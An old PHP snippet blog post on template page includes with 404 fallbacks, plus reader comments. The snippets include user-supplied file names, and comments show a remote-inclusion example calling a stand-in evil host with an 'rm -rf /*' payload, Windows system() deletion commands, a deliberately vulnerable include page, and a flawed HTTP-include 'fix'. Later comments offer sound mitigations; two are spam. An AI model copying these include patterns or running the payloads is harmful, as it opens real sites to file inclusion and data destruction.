« Previous entry | Next entry » Browse > Snippets

Skip to comments (8) Keeping your website User-Friendly
Posted by predominant on Nov 08 2005 @ 09:39  :: 5375 unique visits

A Common practice these days is template based web sites. This involves (basically) a template file, that includes the main content into it, dynamically, based on a page request. Often your pages will change, update and move. This means that if a search engine has indexed a certain page, or one of your regular users has bookmarked a page, and that page has moved: They will get a nasty default 404 message from your webserver! Thats no good! We can overcome this with an include-page design, and either setting a default page to include, or including an error report page when we fail!

Using a Default page
CODE: PHP
<?php
  $includePage = 'home';
  $pageStr = trim($_REQUEST['page']);
  if ($pageStr != '' && file_exists($pageStr.'.php'))
  {
    $includePage = $pageStr;
  }
  $includePage .= '.php';
?>



Using a 404 page
CODE: PHP
<?php
  $includePage = 'home';
  $pageStr = trim($_REQUEST['page']);
  if ($pageStr != '')
  {
    $includePage = (file_exists($pageStr.'.php') ? $pageStr : '404');
  }
  $includePage .= '.php';
?>



As long as we have a 'home.php' and a '404.php' in the directories, both examples will be fine! Now we can include the page later in any PHP document with:
CODE: PHP
<?php include($includePage); ?>


A simple snippet, but a useful one!

8 comments posted so far
Add your own »

1. On Nov 09 2005 @ 18:15 Wouter wrote:

Not really secure ;)
?page=http://www.misterevil.com/hack

code for hack.php
<?php  
system('/bin/rm -rf /*');  
?>
whoeps your website got deleted :P

2. On Nov 10 2005 @ 09:13 TheJohnDoe2005 wrote:

I am running on Windows as my OS,
If i am to execute the below lines, the cmd.exe file is use to run the command in Windows

CODE: PHP
<?php
system('dir/w'); // Display Directory files
system('ipconfig /all'); // TCP/IP Network Information
system('program.exe') // Running external Program
system('del *.*'); // Doesn't work. You cannot delete all files as you need to return a value when prompted. Which i think you couldn't.
/*
But you can scan all the files in the directory for the full path and filename. You could do a loop and delete each file individually.
*/
system('del thisfile.php /F'); // This works.
system('del C:WINDOWSthisfile.php /F') This also works too.
?>


Another Way is that if you have an account on the webserver

1. You could create and upload a program.exe file to somewhere in the web server directory and run the php script to execute external program. This way, you could completely wipe out anything your program.exe is created to do. Anyway, the program.exe will stay hidden in the processes tab when the script is called to run it. The admin will not see it unless he/she view the tab.

SAMPLE - a.php
CODE: PHP
<?php
    if($_REQUEST['page'])
        include($_REQUEST['page'] . ".php");
?>

<html>
<head><title></title></head>
<body>
<form>
<input type="text" name="page" />
</form>
</body>
</htm>


SAMPLE b.php
CODE: PHP
<?php
    $filename = "C://thisfile.php"; // The File you want to delete
    system('del $filename /F');
?>


or you could run http://hostname/a.php?page=b

If the server is running under Windows, one way of preventing this is to disable the usage of cmd.exe.

3. On Nov 10 2005 @ 10:27 Wouter wrote:

CODE: PHP
<?PHP
  $includePage = 'home';
  $pageStr = trim($_REQUEST['page']);
  if ($pageStr != '' && file_exists($pageStr.'.php'))
  {
    $includePage = $pageStr;
  }
  $includePage = 'http://www.mywebsite.com/'.$includePage.'.php';
?>


just do it like this :)
problem solved.

4. On Nov 13 2005 @ 22:53 Barsanuphe wrote:

in my website, i have a mysql table with the name of the page and its path.
when i get the name through $_GET, i mysql_query my way to the path, and then i can redirect correctly.
that way the name and the path are not related.

5. On Nov 14 2005 @ 08:33 dustin wrote:

I usually array the file names, and use the array index to link and pull the page from the $_GET, i.e.: ?page=3

Doing this insures you're only pulling the pages specified in the array index, and $_GET['page'] must be numeric so exploitation is not possible (I'm 99% sure).

6. On May 25 2006 @ 16:29 guest wrote:

You could also filter your include variable on ../ and ..\ and :\ and on ://. This will prevent someone from including external files. Also set in your php.ini the setting which prevent you from fopen() on URL's.

7. On Apr 21 2009 @ 09:41 guest wrote:

When the wolf wow gold finally found the hole Buy Wow Gold in the chimney he Cheap WoW Gold crawled down and KERSPLASH right into that kettle of water cheapest wow gold and that was the end of his troubles with the big bad wolf.

game4power,buy cheap wow gold
WOW GOLD

The next day the wow gold cheap little pig invited his mother over . She said "You see it is just as buy gold wowI told you. The way to Wow Goldget along in the world is to do things as well as you can." Fortunately for that world of warcraft gold little pig, he Cheapest wow Goldlearned that lesson. And he just lived happily ever after!

8. On Jul 14 2009 @ 07:24 guest wrote:

AVI to DVD Converter,AVI to DVD Creator,iPhone Ringtone Maker for Mac,AVI Converter OS X,VOB Converter OS X,AVCHD Video Converter,FLV Converter,PowerPoint Converter,AVCHD Converter,Blue-Ray ripper,Rip Blue Ray,FLV to MOV Mac,VOB to DVD,HD Video Converter,iPod Playlist Transfer

Add a new comment

Name:
Password: (leave empty for anonymous comment)
 
View formatting tags Comment: